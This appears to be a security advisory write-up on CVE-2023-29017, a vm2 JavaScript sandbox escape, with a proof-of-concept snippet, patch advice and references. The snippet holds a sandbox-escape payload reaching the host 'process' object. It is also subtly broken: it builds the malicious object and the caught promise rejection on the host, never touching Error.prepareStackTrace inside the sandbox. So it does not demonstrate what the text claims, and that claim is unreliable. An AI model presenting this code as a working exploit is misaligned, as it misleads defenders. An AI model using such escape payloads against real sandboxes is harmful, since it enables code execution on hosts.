CVE-2023-29017 - vm2 Sandbox Escape via Error.prepareStackTrace Bypass Leading to Remote Code Execution

vm2 is a popular sandbox for running untrusted JavaScript code with whitelisted Node.js built-in modules. It comes with many useful features and checks to allow developers to execute external code without worrying about security issues. However, a vulnerability was discovered in vm2 that could allow an attacker to bypass the sandbox's protections and execute arbitrary code on the host running the sandbox. This vulnerability has been assigned the CVE identifier CVE-2023-29017.

Vulnerability Details

The vulnerability exists in versions of vm2 prior to 3.9.15, and it is related to how the vm2 handles host objects passed to Error.prepareStackTrace in case of unhandled async errors. An attacker can exploit this flaw by passing a maliciously crafted object to Error.prepareStackTrace, which then escapes the sandbox restrictions and executes the arbitrary code on the host.

Here is a code snippet demonstrating how the exploit can work

const { VM } = require('vm2'); // Import the VM2 module

const vm = new VM({}); // Create a new instance of the VM with default settings

// Exploit payload
const payload = `
    globalThis.constructor.constructor("return process")().exit();
`;

// Craft a malicious object to exploit the vulnerability
const maliciousObject = {
    get stack() {
        return {}; // This is the crucial part - an empty object
    }
};

// Trigger unhandled rejection passing the maliciousObject to Error.prepareStackTrace
Promise.reject(maliciousObject).catch(() => {});

// Execute malicious payload in the vm2 instance
vm.run(payload);

// The above code will cause the host process to exit, demonstrating the sandbox escape and code execution

Patched Version and Mitigations

The vulnerability was fixed in version 3.9.15 of vm2. Users should update their installations to the latest version to prevent potential sandbox escapes and remote code execution. There are no known workarounds for this vulnerability, so updating to a patched version is strongly recommended.

References

- The official GitHub repository provides information about vm2: vm2 GitHub Repository
- The issue related to this vulnerability was discussed in this GitHub thread: vm2 GitHub Issue #418
- The official patch release for vm2 can be found here: vm2 3.9.15 on npm
- A detailed explanation of the vulnerability and how it could be exploited is available at this blog post: Code Execution via Error.prepareStackTrace Bypass

Summary

In summary, CVE-2023-29017 can lead to a devastating sandbox escape and remote code execution if an attacker can execute their payloads in a vulnerable vm2 environment. It's important for users to update to version 3.9.15 or later to mitigate against this vulnerability. Care should also be taken when dealing with untrusted code, and developers should ensure their applications are always using the latest security patches and best practices.

Timeline

Published on: 04/06/2023 20:15:00 UTC
Last modified on: 04/13/2023 13:20:00 UTC